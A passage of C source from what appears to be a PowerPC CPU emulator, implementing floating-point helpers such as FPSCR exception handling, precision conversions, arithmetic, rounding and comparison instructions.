MSR_FE0) | (1U << MSR_FE1))) != 0; } /*****************************************************************************/ /* Floating point operations helpers */ /* * This is the non-arithmatic conversion that happens e.g. on loads. * In the Power ISA pseudocode, this is called DOUBLE. */ uint64_t helper_todouble(uint32_t arg) { uint32_t abs_arg = arg & 0x7fffffff; uint64_t ret; if (likely(abs_arg >= 0x00800000)) { if (unlikely(extract32(arg, 23, 8) == 0xff)) { /* Inf or NAN. */ ret = (uint64_t)extract32(arg, 31, 1) << 63; ret |= (uint64_t)0x7ff << 52; ret |= (uint64_t)extract32(arg, 0, 23) << 29; } else { /* Normalized operand. */ ret = (uint64_t)extract32(arg, 30, 2) << 62; ret |= ((extract32(arg, 30, 1) ^ 1) * (uint64_t)7) << 59; ret |= (uint64_t)extract32(arg, 0, 30) << 29; } } else { /* Zero or Denormalized operand. */ ret = (uint64_t)extract32(arg, 31, 1) << 63; if (unlikely(abs_arg != 0)) { /* * Denormalized operand. * Shift fraction so that the msb is in the implicit bit position. * Thus, shift is in the range [1:23]. */ int shift = clz32(abs_arg) - 8; /* * The first 3 terms compute the float64 exponent. We then bias * this result by -1 so that we can swallow the implicit bit below. */ int exp = -126 - shift + 1023 - 1; ret |= (uint64_t)exp << 52; ret += (uint64_t)abs_arg << (52 - 23 + shift); } } return ret; } /* * This is the non-arithmatic conversion that happens e.g. on stores. * In the Power ISA pseudocode, this is called SINGLE. */ uint32_t helper_tosingle(uint64_t arg) { int exp = extract64(arg, 52, 11); uint32_t ret; if (likely(exp > 896)) { /* No denormalization required (includes Inf, NaN). */ ret = extract64(arg, 62, 2) << 30; ret |= extract64(arg, 29, 30); } else { /* * Zero or Denormal result. If the exponent is in bounds for * a single-precision denormal result, extract the proper * bits. If the input is not zero, and the exponent is out of * bounds, then the result is undefined; this underflows to * zero. */ ret = extract64(arg, 63, 1) << 31; if (unlikely(exp >= 874)) { /* Denormal result. */ ret |= ((1ULL << 52) | extract64(arg, 0, 52)) >> (896 + 30 - exp); } } return ret; } static inline int ppc_float32_get_unbiased_exp(float32 f) { return ((f >> 23) & 0xFF) - 127; } static inline int ppc_float64_get_unbiased_exp(float64 f) { return ((f >> 52) & 0x7FF) - 1023; } /* Classify a floating-point number. */ enum { is_normal = 1, is_zero = 2, is_denormal = 4, is_inf = 8, is_qnan = 16, is_snan = 32, is_neg = 64, }; #define COMPUTE_CLASS(tp) \ static int tp##_classify(tp arg) \ { \ int ret = tp##_is_neg(arg) * is_neg; \ if (unlikely(tp##_is_any_nan(arg))) { \ float_status dummy = { 0 }; /* snan_bit_is_one = 0 */ \ ret |= (tp##_is_signaling_nan(arg, &dummy) \ ? is_snan : is_qnan); \ } else if (unlikely(tp##_is_infinity(arg))) { \ ret |= is_inf; \ } else if (tp##_is_zero(arg)) { \ ret |= is_zero; \ } else if (tp##_is_zero_or_denormal(arg)) { \ ret |= is_denormal; \ } else { \ ret |= is_normal; \ } \ return ret; \ } COMPUTE_CLASS(float16) COMPUTE_CLASS(float32) COMPUTE_CLASS(float64) COMPUTE_CLASS(float128) static void set_fprf_from_class(CPUPPCState *env, int class) { static const uint8_t fprf[6][2] = { { 0x04, 0x08 }, /* normalized */ { 0x02, 0x12 }, /* zero */ { 0x14, 0x18 }, /* denormalized */ { 0x05, 0x09 }, /* infinity */ { 0x11, 0x11 }, /* qnan */ { 0x00, 0x00 }, /* snan -- flags are undefined */ }; bool isneg = class & is_neg; env->fpscr &= ~FP_FPRF; env->fpscr |= fprf[ctz32(class)][isneg] << FPSCR_FPRF; } #define COMPUTE_FPRF(tp) \ void helper_compute_fprf_##tp(CPUPPCState *env, tp arg) \ { \ set_fprf_from_class(env, tp##_classify(arg)); \ } COMPUTE_FPRF(float16) COMPUTE_FPRF(float32) COMPUTE_FPRF(float64) COMPUTE_FPRF(float128) /* Floating-point invalid operations exception */ static void finish_invalid_op_excp(CPUPPCState *env, int op, uintptr_t retaddr) { /* Update the floating-point invalid operation summary */ env->fpscr |= FP_VX; /* Update the floating-point exception summary */ env->fpscr |= FP_FX; if (fpscr_ve != 0) { /* Update the floating-point enabled exception summary */ env->fpscr |= FP_FEX; if (fp_exceptions_enabled(env)) { raise_exception_err_ra(env, POWERPC_EXCP_PROGRAM, POWERPC_EXCP_FP | op, retaddr); } } } static void finish_invalid_op_arith(CPUPPCState *env, int op, bool set_fpcc, uintptr_t retaddr) { env->fpscr &= ~(FP_FR | FP_FI); if (fpscr_ve == 0) { if (set_fpcc) { env->fpscr &= ~FP_FPCC; env->fpscr |= (FP_C | FP_FU); } } finish_invalid_op_excp(env, op, retaddr); } /* Signalling NaN */ static void float_invalid_op_vxsnan(CPUPPCState *env, uintptr_t retaddr) { env->fpscr |= FP_VXSNAN; finish_invalid_op_excp(env, POWERPC_EXCP_FP_VXSNAN, retaddr); } /* Magnitude subtraction of infinities */ static void float_invalid_op_vxisi(CPUPPCState *env, bool set_fpcc, uintptr_t retaddr) { env->fpscr |= FP_VXISI; finish_invalid_op_arith(env, POWERPC_EXCP_FP_VXISI, set_fpcc, retaddr); } /* Division of infinity by infinity */ static void float_invalid_op_vxidi(CPUPPCState *env, bool set_fpcc, uintptr_t retaddr) { env->fpscr |= FP_VXIDI; finish_invalid_op_arith(env, POWERPC_EXCP_FP_VXIDI, set_fpcc, retaddr); } /* Division of zero by zero */ static void float_invalid_op_vxzdz(CPUPPCState *env, bool set_fpcc, uintptr_t retaddr) { env->fpscr |= FP_VXZDZ; finish_invalid_op_arith(env, POWERPC_EXCP_FP_VXZDZ, set_fpcc, retaddr); } /* Multiplication of zero by infinity */ static void float_invalid_op_vximz(CPUPPCState *env, bool set_fpcc, uintptr_t retaddr) { env->fpscr |= FP_VXIMZ; finish_invalid_op_arith(env, POWERPC_EXCP_FP_VXIMZ, set_fpcc, retaddr); } /* Square root of a negative number */ static void float_invalid_op_vxsqrt(CPUPPCState *env, bool set_fpcc, uintptr_t retaddr) { env->fpscr |= FP_VXSQRT; finish_invalid_op_arith(env, POWERPC_EXCP_FP_VXSQRT, set_fpcc, retaddr); } /* Ordered comparison of NaN */ static void float_invalid_op_vxvc(CPUPPCState *env, bool set_fpcc, uintptr_t retaddr) { env->fpscr |= FP_VXVC; if (set_fpcc) { env->fpscr &= ~FP_FPCC; env->fpscr |= (FP_C | FP_FU); } /* Update the floating-point invalid operation summary */ env->fpscr |= FP_VX; /* Update the floating-point exception summary */ env->fpscr |= FP_FX; /* We must update the target FPR before raising the exception */ if (fpscr_ve != 0) { CPUState *cs = env_cpu(env); cs->exception_index = POWERPC_EXCP_PROGRAM; env->error_code = POWERPC_EXCP_FP | POWERPC_EXCP_FP_VXVC; /* Update the floating-point enabled exception summary */ env->fpscr |= FP_FEX; /* Exception is deferred */ } } /* Invalid conversion */ static void float_invalid_op_vxcvi(CPUPPCState *env, bool set_fpcc, uintptr_t retaddr) { env->fpscr |= FP_VXCVI; env->fpscr &= ~(FP_FR | FP_FI); if (fpscr_ve == 0) { if (set_fpcc) { env->fpscr &= ~FP_FPCC; env->fpscr |= (FP_C | FP_FU); } } finish_invalid_op_excp(env, POWERPC_EXCP_FP_VXCVI, retaddr); } static inline void float_zero_divide_excp(CPUPPCState *env, uintptr_t raddr) { env->fpscr |= FP_ZX; env->fpscr &= ~(FP_FR | FP_FI); /* Update the floating-point exception summary */ env->fpscr |= FP_FX; if (fpscr_ze != 0) { /* Update the floating-point enabled exception summary */ env->fpscr |= FP_FEX; if (fp_exceptions_enabled(env)) { raise_exception_err_ra(env, POWERPC_EXCP_PROGRAM, POWERPC_EXCP_FP | POWERPC_EXCP_FP_ZX, raddr); } } } static inline void float_overflow_excp(CPUPPCState *env) { CPUState *cs = env_cpu(env); env->fpscr |= FP_OX; /* Update the floating-point exception summary */ env->fpscr |= FP_FX; if (fpscr_oe != 0) { /* XXX: should adjust the result */ /* Update the floating-point enabled exception summary */ env->fpscr |= FP_FEX; /* We must update the target FPR before raising the exception */ cs->exception_index = POWERPC_EXCP_PROGRAM; env->error_code = POWERPC_EXCP_FP | POWERPC_EXCP_FP_OX; } else { env->fpscr |= FP_XX; env->fpscr |= FP_FI; } } static inline void float_underflow_excp(CPUPPCState *env) { CPUState *cs = env_cpu(env); env->fpscr |= FP_UX; /* Update the floating-point exception summary */ env->fpscr |= FP_FX; if (fpscr_ue != 0) { /* XXX: should adjust the result */ /* Update the floating-point enabled exception summary */ env->fpscr |= FP_FEX; /* We must update the target FPR before raising the exception */ cs->exception_index = POWERPC_EXCP_PROGRAM; env->error_code = POWERPC_EXCP_FP | POWERPC_EXCP_FP_UX; } } static inline void float_inexact_excp(CPUPPCState *env) { CPUState *cs = env_cpu(env); env->fpscr |= FP_FI; env->fpscr |= FP_XX; /* Update the floating-point exception summary */ env->fpscr |= FP_FX; if (fpscr_xe != 0) { /* Update the floating-point enabled exception summary */ env->fpscr |= FP_FEX; /* We must update the target FPR before raising the exception */ cs->exception_index = POWERPC_EXCP_PROGRAM; env->error_code = POWERPC_EXCP_FP | POWERPC_EXCP_FP_XX; } } static inline void fpscr_set_rounding_mode(CPUPPCState *env) { int rnd_type; /* Set rounding mode */ switch (fpscr_rn) { case 0: /* Best approximation (round to nearest) */ rnd_type = float_round_nearest_even; break; case 1: /* Smaller magnitude (round toward zero) */ rnd_type = float_round_to_zero; break; case 2: /* Round toward +infinite */ rnd_type = float_round_up; break; default: case 3: /* Round toward -infinite */ rnd_type = float_round_down; break; } set_float_rounding_mode(rnd_type, &env->fp_status); } void helper_fpscr_clrbit(CPUPPCState *env, uint32_t bit) { int prev; prev = (env->fpscr >> bit) & 1; env->fpscr &= ~(1 << bit); if (prev == 1) { switch (bit) { case FPSCR_RN1: case FPSCR_RN0: fpscr_set_rounding_mode(env); break; case FPSCR_VXSNAN: case FPSCR_VXISI: case FPSCR_VXIDI: case FPSCR_VXZDZ: case FPSCR_VXIMZ: case FPSCR_VXVC: case FPSCR_VXSOFT: case FPSCR_VXSQRT: case FPSCR_VXCVI: if (!fpscr_ix) { /* Set VX bit to zero */ env->fpscr &= ~FP_VX; } break; case FPSCR_OX: case FPSCR_UX: case FPSCR_ZX: case FPSCR_XX: case FPSCR_VE: case FPSCR_OE: case FPSCR_UE: case FPSCR_ZE: case FPSCR_XE: if (!fpscr_eex) { /* Set the FEX bit */ env->fpscr &= ~FP_FEX; } break; default: break; } } } void helper_fpscr_setbit(CPUPPCState *env, uint32_t bit) { CPUState *cs = env_cpu(env); int prev; prev = (env->fpscr >> bit) & 1; env->fpscr |= 1ULL << bit; if (prev == 0) { switch (bit) { case FPSCR_VX: env->fpscr |= FP_FX; if (fpscr_ve) { goto raise_ve; } break; case FPSCR_OX: env->fpscr |= FP_FX; if (fpscr_oe) { goto raise_oe; } break; case FPSCR_UX: env->fpscr |= FP_FX; if (fpscr_ue) { goto raise_ue; } break; case FPSCR_ZX: env->fpscr |= FP_FX; if (fpscr_ze) { goto raise_ze; } break; case FPSCR_XX: env->fpscr |= FP_FX; if (fpscr_xe) { goto raise_xe; } break; case FPSCR_VXSNAN: case FPSCR_VXISI: case FPSCR_VXIDI: case FPSCR_VXZDZ: case FPSCR_VXIMZ: case FPSCR_VXVC: case FPSCR_VXSOFT: case FPSCR_VXSQRT: case FPSCR_VXCVI: env->fpscr |= FP_VX; env->fpscr |= FP_FX; if (fpscr_ve != 0) { goto raise_ve; } break; case FPSCR_VE: if (fpscr_vx != 0) { raise_ve: env->error_code = POWERPC_EXCP_FP; if (fpscr_vxsnan) { env->error_code |= POWERPC_EXCP_FP_VXSNAN; } if (fpscr_vxisi) { env->error_code |= POWERPC_EXCP_FP_VXISI; } if (fpscr_vxidi) { env->error_code |= POWERPC_EXCP_FP_VXIDI; } if (fpscr_vxzdz) { env->error_code |= POWERPC_EXCP_FP_VXZDZ; } if (fpscr_vximz) { env->error_code |= POWERPC_EXCP_FP_VXIMZ; } if (fpscr_vxvc) { env->error_code |= POWERPC_EXCP_FP_VXVC; } if (fpscr_vxsoft) { env->error_code |= POWERPC_EXCP_FP_VXSOFT; } if (fpscr_vxsqrt) { env->error_code |= POWERPC_EXCP_FP_VXSQRT; } if (fpscr_vxcvi) { env->error_code |= POWERPC_EXCP_FP_VXCVI; } goto raise_excp; } break; case FPSCR_OE: if (fpscr_ox != 0) { raise_oe: env->error_code = POWERPC_EXCP_FP | POWERPC_EXCP_FP_OX; goto raise_excp; } break; case FPSCR_UE: if (fpscr_ux != 0) { raise_ue: env->error_code = POWERPC_EXCP_FP | POWERPC_EXCP_FP_UX; goto raise_excp; } break; case FPSCR_ZE: if (fpscr_zx != 0) { raise_ze: env->error_code = POWERPC_EXCP_FP | POWERPC_EXCP_FP_ZX; goto raise_excp; } break; case FPSCR_XE: if (fpscr_xx != 0) { raise_xe: env->error_code = POWERPC_EXCP_FP | POWERPC_EXCP_FP_XX; goto raise_excp; } break; case FPSCR_RN1: case FPSCR_RN0: fpscr_set_rounding_mode(env); break; default: break; raise_excp: /* Update the floating-point enabled exception summary */ env->fpscr |= FP_FEX; /* We have to update Rc1 before raising the exception */ cs->exception_index = POWERPC_EXCP_PROGRAM; break; } } } void helper_store_fpscr(CPUPPCState *env, uint64_t arg, uint32_t mask) { CPUState *cs = env_cpu(env); target_ulong prev, new; int i; prev = env->fpscr; new = (target_ulong)arg; new &= ~(FP_FEX | FP_VX); new |= prev & (FP_FEX | FP_VX); for (i = 0; i < sizeof(target_ulong) * 2; i++) { if (mask & (1 << i)) { env->fpscr &= ~(0xFLL << (4 * i)); env->fpscr |= new & (0xFLL << (4 * i)); } } /* Update VX and FEX */ if (fpscr_ix != 0) { env->fpscr |= FP_VX; } else { env->fpscr &= ~FP_VX; } if ((fpscr_ex & fpscr_eex) != 0) { env->fpscr |= FP_FEX; cs->exception_index = POWERPC_EXCP_PROGRAM; /* XXX: we should compute it properly */ env->error_code = POWERPC_EXCP_FP; } else { env->fpscr &= ~FP_FEX; } fpscr_set_rounding_mode(env); } void store_fpscr(CPUPPCState *env, uint64_t arg, uint32_t mask) { helper_store_fpscr(env, arg, mask); } static void do_float_check_status(CPUPPCState *env, uintptr_t raddr) { CPUState *cs = env_cpu(env); int status = get_float_exception_flags(&env->fp_status); if (status & float_flag_overflow) { float_overflow_excp(env); } else if (status & float_flag_underflow) { float_underflow_excp(env); } if (status & float_flag_inexact) { float_inexact_excp(env); } else { env->fpscr &= ~FP_FI; /* clear the FPSCR[FI] bit */ } if (cs->exception_index == POWERPC_EXCP_PROGRAM && (env->error_code & POWERPC_EXCP_FP)) { /* Deferred floating-point exception after target FPR update */ if (fp_exceptions_enabled(env)) { raise_exception_err_ra(env, cs->exception_index, env->error_code, raddr); } } } void helper_float_check_status(CPUPPCState *env) { do_float_check_status(env, GETPC()); } void helper_reset_fpstatus(CPUPPCState *env) { set_float_exception_flags(0, &env->fp_status); } static void float_invalid_op_addsub(CPUPPCState *env, bool set_fpcc, uintptr_t retaddr, int classes) { if ((classes & ~is_neg) == is_inf) { /* Magnitude subtraction of infinities */ float_invalid_op_vxisi(env, set_fpcc, retaddr); } else if (classes & is_snan) { float_invalid_op_vxsnan(env, retaddr); } } /* fadd - fadd. */ float64 helper_fadd(CPUPPCState *env, float64 arg1, float64 arg2) { float64 ret = float64_add(arg1, arg2, &env->fp_status); int status = get_float_exception_flags(&env->fp_status); if (unlikely(status & float_flag_invalid)) { float_invalid_op_addsub(env, 1, GETPC(), float64_classify(arg1) | float64_classify(arg2)); } return ret; } /* fsub - fsub. */ float64 helper_fsub(CPUPPCState *env, float64 arg1, float64 arg2) { float64 ret = float64_sub(arg1, arg2, &env->fp_status); int status = get_float_exception_flags(&env->fp_status); if (unlikely(status & float_flag_invalid)) { float_invalid_op_addsub(env, 1, GETPC(), float64_classify(arg1) | float64_classify(arg2)); } return ret; } static void float_invalid_op_mul(CPUPPCState *env, bool set_fprc, uintptr_t retaddr, int classes) { if ((classes & (is_zero | is_inf)) == (is_zero | is_inf)) { /* Multiplication of zero by infinity */ float_invalid_op_vximz(env, set_fprc, retaddr); } else if (classes & is_snan) { float_invalid_op_vxsnan(env, retaddr); } } /* fmul - fmul. */ float64 helper_fmul(CPUPPCState *env, float64 arg1, float64 arg2) { float64 ret = float64_mul(arg1, arg2, &env->fp_status); int status = get_float_exception_flags(&env->fp_status); if (unlikely(status & float_flag_invalid)) { float_invalid_op_mul(env, 1, GETPC(), float64_classify(arg1) | float64_classify(arg2)); } return ret; } static void float_invalid_op_div(CPUPPCState *env, bool set_fprc, uintptr_t retaddr, int classes) { classes &= ~is_neg; if (classes == is_inf) { /* Division of infinity by infinity */ float_invalid_op_vxidi(env, set_fprc, retaddr); } else if (classes == is_zero) { /* Division of zero by zero */ float_invalid_op_vxzdz(env, set_fprc, retaddr); } else if (classes & is_snan) { float_invalid_op_vxsnan(env, retaddr); } } /* fdiv - fdiv. */ float64 helper_fdiv(CPUPPCState *env, float64 arg1, float64 arg2) { float64 ret = float64_div(arg1, arg2, &env->fp_status); int status = get_float_exception_flags(&env->fp_status); if (unlikely(status)) { if (status & float_flag_invalid) { float_invalid_op_div(env, 1, GETPC(), float64_classify(arg1) | float64_classify(arg2)); } if (status & float_flag_divbyzero) { float_zero_divide_excp(env, GETPC()); } } return ret; } static void float_invalid_cvt(CPUPPCState *env, bool set_fprc, uintptr_t retaddr, int class1) { float_invalid_op_vxcvi(env, set_fprc, retaddr); if (class1 & is_snan) { float_invalid_op_vxsnan(env, retaddr); } } #define FPU_FCTI(op, cvt, nanval) \ uint64_t helper_##op(CPUPPCState *env, float64 arg) \ { \ uint64_t ret = float64_to_##cvt(arg, &env->fp_status); \ int status = get_float_exception_flags(&env->fp_status); \ \ if (unlikely(status)) { \ if (status & float_flag_invalid) { \ float_invalid_cvt(env, 1, GETPC(), float64_classify(arg)); \ ret = nanval; \ } \ do_float_check_status(env, GETPC()); \ } \ return ret; \ } FPU_FCTI(fctiw, int32, 0x80000000U) FPU_FCTI(fctiwz, int32_round_to_zero, 0x80000000U) FPU_FCTI(fctiwu, uint32, 0x00000000U) FPU_FCTI(fctiwuz, uint32_round_to_zero, 0x00000000U) FPU_FCTI(fctid, int64, 0x8000000000000000ULL) FPU_FCTI(fctidz, int64_round_to_zero, 0x8000000000000000ULL) FPU_FCTI(fctidu, uint64, 0x0000000000000000ULL) FPU_FCTI(fctiduz, uint64_round_to_zero, 0x0000000000000000ULL) #define FPU_FCFI(op, cvtr, is_single) \ uint64_t helper_##op(CPUPPCState *env, uint64_t arg) \ { \ CPU_DoubleU farg; \ \ if (is_single) { \ float32 tmp = cvtr(arg, &env->fp_status); \ farg.d = float32_to_float64(tmp, &env->fp_status); \ } else { \ farg.d = cvtr(arg, &env->fp_status); \ } \ do_float_check_status(env, GETPC()); \ return farg.ll; \ } FPU_FCFI(fcfid, int64_to_float64, 0) FPU_FCFI(fcfids, int64_to_float32, 1) FPU_FCFI(fcfidu, uint64_to_float64, 0) FPU_FCFI(fcfidus, uint64_to_float32, 1) static inline uint64_t do_fri(CPUPPCState *env, uint64_t arg, int rounding_mode) { CPU_DoubleU farg; farg.ll = arg; if (unlikely(float64_is_signaling_nan(farg.d, &env->fp_status))) { /* sNaN round */ float_invalid_op_vxsnan(env, GETPC()); farg.ll = arg | 0x0008000000000000ULL; } else { int inexact = get_float_exception_flags(&env->fp_status) & float_flag_inexact; set_float_rounding_mode(rounding_mode, &env->fp_status); farg.ll = float64_round_to_int(farg.d, &env->fp_status); /* Restore rounding mode from FPSCR */ fpscr_set_rounding_mode(env); /* fri* does not set FPSCR[XX] */ if (!inexact) { env->fp_status.float_exception_flags &= ~float_flag_inexact; } } do_float_check_status(env, GETPC()); return farg.ll; } uint64_t helper_frin(CPUPPCState *env, uint64_t arg) { return do_fri(env, arg, float_round_ties_away); } uint64_t helper_friz(CPUPPCState *env, uint64_t arg) { return do_fri(env, arg, float_round_to_zero); } uint64_t helper_frip(CPUPPCState *env, uint64_t arg) { return do_fri(env, arg, float_round_up); } uint64_t helper_frim(CPUPPCState *env, uint64_t arg) { return do_fri(env, arg, float_round_down); } #define FPU_MADDSUB_UPDATE(NAME, TP) \ static void NAME(CPUPPCState *env, TP arg1, TP arg2, TP arg3, \ unsigned int madd_flags, uintptr_t retaddr) \ { \ if (TP##_is_signaling_nan(arg1, &env->fp_status) || \ TP##_is_signaling_nan(arg2, &env->fp_status) || \ TP##_is_signaling_nan(arg3, &env->fp_status)) { \ /* sNaN operation */ \ float_invalid_op_vxsnan(env, retaddr); \ } \ if ((TP##_is_infinity(arg1) && TP##_is_zero(arg2)) || \ (TP##_is_zero(arg1) && TP##_is_infinity(arg2))) { \ /* Multiplication of zero by infinity */ \ float_invalid_op_vximz(env, 1, retaddr); \ } \ if ((TP##_is_infinity(arg1) || TP##_is_infinity(arg2)) && \ TP##_is_infinity(arg3)) { \ uint8_t aSign, bSign, cSign; \ \ aSign = TP##_is_neg(arg1); \ bSign = TP##_is_neg(arg2); \ cSign = TP##_is_neg(arg3); \ if (madd_flags & float_muladd_negate_c) { \ cSign ^= 1; \ } \ if (aSign ^ bSign ^ cSign) { \ float_invalid_op_vxisi(env, 1, retaddr); \ } \ } \ } FPU_MADDSUB_UPDATE(float32_maddsub_update_excp, float32) FPU_MADDSUB_UPDATE(float64_maddsub_update_excp, float64) #define FPU_FMADD(op, madd_flags) \ uint64_t helper_##op(CPUPPCState *env, uint64_t arg1, \ uint64_t arg2, uint64_t arg3) \ { \ uint32_t flags; \ float64 ret = float64_muladd(arg1, arg2, arg3, madd_flags, \ &env->fp_status); \ flags = get_float_exception_flags(&env->fp_status); \ if (flags) { \ if (flags & float_flag_invalid) { \ float64_maddsub_update_excp(env, arg1, arg2, arg3, \ madd_flags, GETPC()); \ } \ do_float_check_status(env, GETPC()); \ } \ return ret; \ } #define MADD_FLGS 0 #define MSUB_FLGS float_muladd_negate_c #define NMADD_FLGS float_muladd_negate_result #define NMSUB_FLGS (float_muladd_negate_c | float_muladd_negate_result) FPU_FMADD(fmadd, MADD_FLGS) FPU_FMADD(fnmadd, NMADD_FLGS) FPU_FMADD(fmsub, MSUB_FLGS) FPU_FMADD(fnmsub, NMSUB_FLGS) /* frsp - frsp. */ uint64_t helper_frsp(CPUPPCState *env, uint64_t arg) { CPU_DoubleU farg; float32 f32; farg.ll = arg; if (unlikely(float64_is_signaling_nan(farg.d, &env->fp_status))) { float_invalid_op_vxsnan(env, GETPC()); } f32 = float64_to_float32(farg.d, &env->fp_status); farg.d = float32_to_float64(f32, &env->fp_status); return farg.ll; } /* fsqrt - fsqrt. */ float64 helper_fsqrt(CPUPPCState *env, float64 arg) { float64 ret = float64_sqrt(arg, &env->fp_status); int status = get_float_exception_flags(&env->fp_status); if (unlikely(status & float_flag_invalid)) { if (unlikely(float64_is_any_nan(arg))) { if (unlikely(float64_is_signaling_nan(arg, &env->fp_status))) { /* sNaN square root */ float_invalid_op_vxsnan(env, GETPC()); } } else { /* Square root of a negative nonzero number */ float_invalid_op_vxsqrt(env, 1, GETPC()); } } return ret; } /* fre - fre. */ float64 helper_fre(CPUPPCState *env, float64 arg) { /* "Estimate" the reciprocal with actual division. */ float64 ret = float64_div(float64_one, arg, &env->fp_status); int status = get_float_exception_flags(&env->fp_status); if (unlikely(status)) { if (status & float_flag_invalid) { if (float64_is_signaling_nan(arg, &env->fp_status)) { /* sNaN reciprocal */ float_invalid_op_vxsnan(env, GETPC()); } } if (status & float_flag_divbyzero) { float_zero_divide_excp(env, GETPC()); /* For FPSCR.ZE == 0, the result is 1/2. */ ret = float64_set_sign(float64_half, float64_is_neg(arg)); } } return ret; } /* fres - fres. */ uint64_t helper_fres(CPUPPCState *env, uint64_t arg) { CPU_DoubleU farg; float32 f32; farg.ll = arg; if (unlikely(float64_is_signaling_nan(farg.d, &env->fp_status))) { /* sNaN reciprocal */ float_invalid_op_vxsnan(env, GETPC()); } farg.d = float64_div(float64_one, farg.d, &env->fp_status); f32 = float64_to_float32(farg.d, &env->fp_status); farg.d = float32_to_float64(f32, &env->fp_status); return farg.ll; } /* frsqrte - frsqrte. */ float64 helper_frsqrte(CPUPPCState *env, float64 arg) { /* "Estimate" the reciprocal with actual division. */ float64 rets = float64_sqrt(arg, &env->fp_status); float64 retd = float64_div(float64_one, rets, &env->fp_status); int status = get_float_exception_flags(&env->fp_status); if (unlikely(status)) { if (status & float_flag_invalid) { if (float64_is_signaling_nan(arg, &env->fp_status)) { /* sNaN reciprocal */ float_invalid_op_vxsnan(env, GETPC()); } else { /* Square root of a negative nonzero number */ float_invalid_op_vxsqrt(env, 1, GETPC()); } } if (status & float_flag_divbyzero) { /* Reciprocal of (square root of) zero. */ float_zero_divide_excp(env, GETPC()); } } return retd; } /* fsel - fsel. */ uint64_t helper_fsel(CPUPPCState *env, uint64_t arg1, uint64_t arg2, uint64_t arg3) { CPU_DoubleU farg1; farg1.ll = arg1; if ((!float64_is_neg(farg1.d) || float64_is_zero(farg1.d)) && !float64_is_any_nan(farg1.d)) { return arg2; } else { return arg3; } } uint32_t helper_ftdiv(uint64_t fra, uint64_t frb) { int fe_flag = 0; int fg_flag = 0; if (unlikely(float64_is_infinity(fra) || float64_is_infinity(frb) || float64_is_zero(frb))) { fe_flag = 1; fg_flag = 1; } else { int e_a = ppc_float64_get_unbiased_exp(fra); int e_b = ppc_float64_get_unbiased_exp(frb); if (unlikely(float64_is_any_nan(fra) || float64_is_any_nan(frb))) { fe_flag = 1; } else if ((e_b <= -1022) || (e_b >= 1021)) { fe_flag = 1; } else if (!float64_is_zero(fra) && (((e_a - e_b) >= 1023) || ((e_a - e_b) <= -1021) || (e_a <= -970))) { fe_flag = 1; } if (unlikely(float64_is_zero_or_denormal(frb))) { /* XB is not zero because of the above check and */ /* so must be denormalized. */ fg_flag = 1; } } return 0x8 | (fg_flag ? 4 : 0) | (fe_flag ? 2 : 0); } uint32_t helper_ftsqrt(uint64_t frb) { int fe_flag = 0; int fg_flag = 0; if (unlikely(float64_is_infinity(frb) || float64_is_zero(frb))) { fe_flag = 1; fg_flag = 1; } else { int e_b = ppc_float64_get_unbiased_exp(frb); if (unlikely(float64_is_any_nan(frb))) { fe_flag = 1; } else if (unlikely(float64_is_zero(frb))) { fe_flag = 1; } else if (unlikely(float64_is_neg(frb))) { fe_flag = 1; } else if (!float64_is_zero(frb) && (e_b <= (-1022 + 52))) { fe_flag = 1; } if (unlikely(float64_is_zero_or_denormal(frb))) { /* XB is not zero because of the above check and */ /* therefore must be denormalized. */ fg_flag = 1; } } return 0x8 | (fg_flag ? 4 : 0) | (fe_flag ? 2 : 0); } void helper_fcmpu(CPUPPCState *env, uint64_t arg1, uint64_t arg2, uint32_t crfD) { CPU_DoubleU farg1, farg2; uint32_t ret = 0; farg1.ll = arg1; farg2.ll = arg2; if (unlikely(float64_is_any_nan(farg1.d) || float64_is_any_nan(farg2.d))) { ret = 0x01UL; } else if (float64_lt(farg1.d, farg2.d, &env->fp_status)) { ret = 0x08UL; } else if (!float64_le(farg1.d, farg2.d, &env->fp_status)) { ret = 0x04UL; } else { ret = 0x02UL; } env->fpscr &= ~FP_FPCC; env->fpscr |= ret << FPSCR_FPCC; env->crf[crfD] = ret; if (unlikely(ret == 0x01UL && (float64_is_signaling_nan(farg1.d, &env->fp_status) || float64_is_signaling_nan(farg2.d, &env->fp_status)))) { /* sNaN comparison */ float_invalid_op_vxsnan(env, GETPC()); } } void helper_fcmpo(CPUPPCState *env, uint64_t arg1, uint64_t arg2, uint32_t crfD) { CPU_DoubleU farg1, farg2; uint32_t ret = 0; farg1.ll = arg1; farg2.ll = arg2; if (unlikely(float64_is_any_nan(farg1.d) || float64_is_any_nan(farg2.d))) { ret = 0x01UL; } else if (float64_lt(farg1.d, farg2.d, &env->fp_status)) { ret = 0x08UL; } else if (!float64_le(farg1.d, farg2.d, &env->fp_status)) { ret = 0x04UL; } else { ret = 0x02UL; } env->fpscr &= ~FP_FPCC; env->fpscr |= ret << FPSCR_FPCC; env->crf[crfD] = (uint32_t) ret; if (unlikely(ret == 0x01UL)) { float_invalid_op_vxvc(env, 1, GETPC()); if (float64_is_signaling_nan(farg1.d, &env->fp_status) || float64_is_signaling_nan(farg2.d, &env->fp_status)) { /* sNaN comparison */ float_invalid_op_vxsnan(env, GETPC()); } } } /* Single-precision floating-point conversions */ static inline uint32_t efscfsi(CPUPPCState *env, uint32_t val) { CPU_FloatU u; u.f = int32_to_float32(val, &env->vec_status); return u.l; } static inline uint32_t efscfui(CPUPPCState *env, uint32_t val) { CPU_FloatU u; u.f = uint32_to_float32(val, &env->vec_status); return u.l; } static inline int32_t efsctsi(CPUPPCState *env, uint32_t val) { CPU_FloatU u; u.l = val; /* NaN are not treated the same way IEEE 754 does */ if (unlikely(float32_is_quiet_nan(u.f, &env->vec_status))) { return 0; } return float32_to_int32(u.f, &env->vec_status); } static inline uint32_t efsctui(CPUPPCState *env, uint32_t val) { CPU_FloatU u; u.l = val; /* NaN are not treated the same way IEEE 754 does */ if (unlikely(float32_is_quiet_nan(u.f, &env->vec_status))) { return 0; } return float32_to_uint32(u.f, &env->vec_status); } static inline uint32_t efsctsiz(CPUPPCState *env, uint32_t val) { CPU_FloatU u; u.l = val; /* NaN are not treated the same way IEEE 754 does */ if (unlikely(float32_is_quiet_nan(u.f, &env->vec_status))) { return 0; } return float32_to_int32_round_to_zero(u.f, &env->vec_status); } static inline uint32_t efsctuiz(CPUPPCState *env, uint32_t val) { CPU_FloatU u; u.l = val; /* NaN are not treated the same way IEEE 754 does */ if (unlikely(float32_is_quiet_nan(u.f, &env->vec_status))) { return 0; } return float32_to_uint32_round_to_zero(u.f, &env->vec_status); } static inline uint32_t efscfsf(CPUPPCState *env, uint32_t val) { CPU_FloatU u; float32 tmp; u.f = int32_to_float32(val, &env->vec_status); tmp = 